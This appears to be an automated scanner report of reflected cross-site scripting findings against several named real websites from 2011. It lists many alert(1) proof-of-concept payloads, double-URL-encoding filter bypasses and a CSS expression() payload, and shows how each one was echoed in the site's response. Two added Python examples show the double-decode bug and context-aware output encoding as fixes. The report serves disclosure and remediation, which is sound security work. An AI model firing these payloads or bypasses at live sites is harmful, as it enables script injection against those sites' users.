Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03a8"><script>alert(1)</script>c3c94a296fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 458c0'a%3d'b'4d608cb70ba was submitted in the REST URL parameter 1. This input was echoed as 458c0'a='b'4d608cb70ba in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2534<img%20src%3da%20onerror%3dalert(1)>37bac4424e8 was submitted in the REST URL parameter 1. This input was echoed as d2534<img src=a onerror=alert(1)>37bac4424e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:16:05 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=2E9FDB931F9B6388A0C7CAAC94BB4C2B; Domain=.gather.com; Path=/
Set-Cookie: vis=HdkU8Hbs5hVHjy83U0WCj9VGT69anurplgmT88MsvzJmo10NLnFruY71+tQe++OV1dSVwln4y+rMysAb/tHSXjQkh06aFmEiWWtZ2tFz9WU=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=VXl8U+/+uLjaIQOofjluHpYUf7slxcvwMQUvAbTFwVWvH1vlzmhLTQ4JX2/DYNAh/PDi8iZy201gdHx/+MlBWEc6TVjrfEoNDT8iC3OTKHDhp5A2eWAH5qtL+lsfjkIZ; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cf4"><a>f6e771fb85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:15:47 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=11CBF94ACC4AE7E65E1C4A80E106B29B; Domain=.gather.com; Path=/
Set-Cookie: vis=IQEE2srEKXa7NIKTUcORrOUj7hWAro2sGoX+WTfIfx9z48PQx/dnfCx/jFJ1YkriqWn6kqfjRS9ZYk8SSfkIh/+Cq7DpbNRKce0obUmjiNg=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=CbQ2sV5k921W3oerMNOFf5YUf7slxcvw/6LJ3a72UYFqB5zXunhsOH3jBkWIAmPPr2nN88tvgFf57wOJd0hurgUMKy/C08uq57pV6xba8OePrfbi7B6t42HYXo/XC829; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0bd"><script>alert(1)</script>315a16ef299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe436"-alert(1)-"585424767da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e5b"><img%20src%3da%20onerror%3dalert(1)>12e6ef332ea was submitted in the REST URL parameter 1. This input was echoed as 96e5b"><img src=a onerror=alert(1)>12e6ef332ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 Not Found
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx/0.7.65
Vary: Accept-Encoding
Date: Thu, 31 Mar 2011 21:17:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41129
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31abe"><script>alert(1)</script>178f2c2e0b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79fd0"%3b8fb452cbcec was submitted in the REST URL parameter 1. This input was echoed as 79fd0";8fb452cbcec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Thu, 31 Mar 2011 20:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51644
<!-- URI: /favicon.ico79fd0";8fb452cbcecservletName: defaultstatusCode: 404 --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> < ...[SNIP]... cadc=0;var erpm=0; /*var unicaEvents = new Array(); var unicaEventIdx = 0;*/ var g_cfn="generalhealth"; var g_cfn_bold = "generalhealth"; var g_encoded_uri = encodeURI("/favicon.ico79fd0";8fb452cbcec"); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb99a%2522%253balert%25281%2529%252f%252f03025ba1a26 was submitted in the REST URL parameter 1. This input was echoed as fb99a";alert(1)//03025ba1a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters. The payload above submits %2522 in place of %22 for the double quotation mark (and %253b, %2528, %2529 and %252f for ; ( ) and /): the web server's single decode turns these back into ordinary percent-sequences, which the filter does not reject, and the application's own second decode then produces the raw characters inside the JavaScript string.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37f8"><script>alert(1)</script>b1d942b5500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:00:28 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h ...[SNIP]... <input type="hidden" name="returl" value="http://www.inc.com/favicon.icoe37f8"><script>alert(1)</script>b1d942b5500"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d1c6<script>alert(1)</script>b7be8b4f11a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Content-Length: 17716
Cache-Control: no-cache
X-Cacheable: no-404
Date: Thu, 31 Mar 2011 20:18:02 GMT
X-Varnish: 769684798
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <p> We're sorry, the URL http://www.instructables.com/favicon.ico9d1c6<script>alert(1)</script>b7be8b4f11a is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below. </p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ca9c51b078d was submitted in the REST URL parameter 1. This input was echoed as 415f4"style="x:expression(alert(1))"ca9c51b078d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (and Internet Explorer 8 and later only honour expression() in compatibility or quirks mode), so it may not work in other browsers; the underlying flaw, breaking out of a double-quoted attribute value, is not browser-specific.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters. The payload above submits %2522 for the double quotation mark, %253d for =, %253a for : and %2528/%2529 for the parentheses: the web server's single decode leaves ordinary percent-sequences that the filter does not reject, and the application's own second decode then produces the raw characters.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
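The double-decoding bypass described in this finding and in the earlier one on the same REST URL parameter (the %2522 payload that lands in a JavaScript string), as an added worked example that is not part of the scanner report or of any scanned site's code. It models a handler that checks for dangerous characters after the web server's single URL-decode but then decodes a second time, beside a version that decodes once, validates the canonical value and encodes for the output context. The blacklist, the handler names and the response template are hypothetical; the double-encoded request path is the payload copied from the report and the single-encoded one is constructed from it.

```python
from urllib.parse import unquote
import json

# Payload copied from the report: every dangerous character is percent-encoded twice.
DOUBLE_ENCODED = "/favicon.icofb99a%2522%253balert%25281%2529%252f%252f03025ba1a26"
# The same attack encoded only once (constructed): this is what the blacklist was written to stop.
SINGLE_ENCODED = "/favicon.icofb99a%22%3balert%281%29%2f%2f03025ba1a26"

# Characters the hypothetical blacklist rejects.
BLOCKED = set('<>"\';')


def server_decode(raw_path: str) -> str:
    """The single percent-decode the web server performs before the application sees the path."""
    return unquote(raw_path)


def passes_filter(value: str) -> bool:
    """Hypothetical blacklist check: True when none of the blocked characters is present."""
    return not any(ch in BLOCKED for ch in value)


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal (JSON escaping), additionally turning
    < > & into \\u escapes so that </script> and HTML-comment sequences cannot survive."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def vulnerable_handler(raw_path: str) -> str:
    """Validates, then URL-decodes a second time, so the check never sees the decoded quote."""
    path = server_decode(raw_path)
    if not passes_filter(path):
        return "rejected"
    path = unquote(path)  # second decode after validation: the bug the report describes
    return 'var g_encoded_uri = encodeURI("%s");' % path  # raw interpolation into a JS string


def fixed_handler(raw_path: str) -> str:
    """Decodes once, validates the canonical value, then encodes for the JavaScript string context."""
    path = server_decode(raw_path)
    # No second decode. Any canonicalisation the application genuinely needs would go here,
    # before the validation step, never after it.
    if not passes_filter(path):
        return "rejected"
    return "var g_encoded_uri = encodeURI(%s);" % js_string_literal(path)


def render_encoded_only(raw_path: str) -> str:
    """Output encoding alone, without the blacklist: the quote reaches the page but cannot
    terminate the string literal. This is the defence that does not depend on the filter."""
    return "var g_encoded_uri = encodeURI(%s);" % js_string_literal(server_decode(raw_path))
```

The blacklist does stop the single-encoded request against both handlers, which is exactly why the scanner reports that "the application attempts to block certain characters"; the double-encoded request passes the check and is only neutralised by not decoding twice and by encoding for the script context on output.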
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a7e</script><script>alert(1)</script>9c95a9e9202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd1d8"-alert(1)-"9734fb6d31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:46:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22648
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icofd1d8"-alert(1)-"9734fb6d31b",c5:"",c6:"",c15:""});</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b93"><script>alert(1)</script>3d2ada0bfcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:46:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.letssingit.com/favicon.ico23b93"><script>alert(1)</script>3d2ada0bfcc&c5=&c6=&c15=&cj=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e9"><script>alert(1)</script>7486580f0c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a0b</script><script>alert(1)</script>053b8181b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c16"><script>alert(1)</script>ab163775080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 912d0"><script>alert(1)</script>2b43f02c700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93d7<script>alert(1)</script>f43fd169a2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db86"><script>alert(1)</script>8ee9b35128d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico6db86"><script>alert(1)</script>8ee9b35128d at Thu Mar 31 20:06:25 2011 +0000 from 173.193.214.243"> ...[SNIP]...
1.77. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.manta.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28af8"><script>alert(1)</script>20b7a85cc1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?28af8"><script>alert(1)</script>20b7a85cc1d=1 at Thu Mar 31 20:06:24 2011 +0000 from 173.193.214.243"> ...[SNIP]...
1.78. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.manta.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd9eb<script>alert(1)</script>76a74a9ba72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f12b"><script>alert(1)</script>8202a0642d4 was submitted in the REST URL parameter 1. This input was echoed as 7f12b\"><script>alert(1)</script>8202a0642d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The backslash inserted before the quotation mark is a JavaScript-style escape applied in an HTML attribute context, where the HTML parser gives a backslash no special meaning: the quotation mark still terminates the attribute value, so this escaping does not prevent the attack.
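Context-aware output encoding for the reflected-path error pages that make up most of these findings, as an added worked example that is not code from the scanner report or from any of the scanned sites. It covers the three output contexts the findings keep naming (text between tags including the TITLE element, a double-quoted attribute value, and a double-quoted JavaScript string), the "avoid echoing user data within a script context" remediation note, and the backslash-escaped quotation mark just above, which it shows to be ineffective. The page template, the host name example.invalid and the function names are hypothetical; the payloads are copied from the report.

```python
import html
import json

# Payloads copied from the report's findings, reused here as constructed test input.
TITLE_PAYLOAD = "33f72</title><script>alert(1)</script>7bc3345a70f"
ATTR_PAYLOAD = '7f12b"><script>alert(1)</script>8202a0642d4'
JS_PAYLOAD = 'fd1d8"-alert(1)-"9734fb6d31b'
SCRIPT_BREAKOUT = "b3a7e</script><script>alert(1)</script>9c95a9e9202"


def html_text(value: str) -> str:
    """For text between tags, including TITLE: encoding & < > is sufficient, quotes are harmless here."""
    return html.escape(value, quote=False)


def html_attr(value: str) -> str:
    """For a quoted attribute value: additionally encode both quote characters."""
    return html.escape(value, quote=True)


def js_string(value: str) -> str:
    """For the inside of a double-quoted JavaScript string literal: JSON escaping for the quote
    and backslash, plus \\u escapes for < > & so that </script> cannot survive either."""
    return (json.dumps(value)[1:-1]
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def backslash_escape(value: str) -> str:
    """The ineffective defence seen in the finding above: a JavaScript-style backslash before each
    quote, applied to an HTML attribute, where the parser does not treat backslash as an escape."""
    return value.replace('"', '\\"')


def attribute_breaks_out(encoded_value: str) -> bool:
    """True if an HTML parser would see the end of a double-quoted attribute inside this value."""
    return '"' in encoded_value


# Hypothetical 404 page shaped like the ones in the report: the requested path is reflected
# in the title, in a heading, in a hidden form field and in an inline script.
NOT_FOUND_TEMPLATE = (
    '<html><head><title>{title} not found on example.invalid</title></head>'
    '<body><h1>{title} not found on example.invalid</h1>'
    '<input type="hidden" name="returl" value="{attr}">'
    '<script>var g_encoded_uri = encodeURI("{js}");</script></body></html>'
)


def render_not_found_vulnerable(path: str) -> str:
    """The page as the scanned sites build it: the raw value goes into every context unchanged."""
    return NOT_FOUND_TEMPLATE.format(title=path, attr=path, js=path)


def render_not_found_fixed(path: str) -> str:
    """The same page with an encoder chosen per output context."""
    return NOT_FOUND_TEMPLATE.format(title=html_text(path), attr=html_attr(path), js=js_string(path))
```

Two details matter in practice. Inside TITLE the browser decodes entity references but never parses tags, so `&lt;/title&gt;` is displayed as text and cannot close the element, whereas the raw payload does. And a quote inside a JavaScript string needs a JavaScript escape, a quote inside an attribute needs an HTML entity; applying one context's escaping to the other context, as the backslash case does, leaves the delimiter intact.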
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e91"><a%20b%3dc>acd858b3881 was submitted in the REST URL parameter 1. This input was echoed as 42e91"><a b=c>acd858b3881 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5074a"><script>alert(1)</script>0868326e682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77908"><script>alert(1)</script>f5f1cf68a57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95621</script><script>alert(1)</script>c7269d76e3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337a"><script>alert(1)</script>b4d26af53b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f569e<script>alert(1)</script>62a34c3c606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:51:46 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 5934 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /favicon.icof569e<script>alert(1)</script>62a34c3c606 not found!</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29072</script><script>alert(1)</script>d9a3c1f9652 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73daa"><a>7dd5ddc4d44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2267'%3b18c314fa453 was submitted in the REST URL parameter 1. This input was echoed as f2267';18c314fa453 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a805e<script>alert(1)</script>a14fd80a43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd33a'%3balert(1)//53648ea2dc8 was submitted in the REST URL parameter 1. This input was echoed as cd33a';alert(1)//53648ea2dc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca48"-alert(1)-"68a04308ce8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f94"><script>alert(1)</script>5e88123921 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
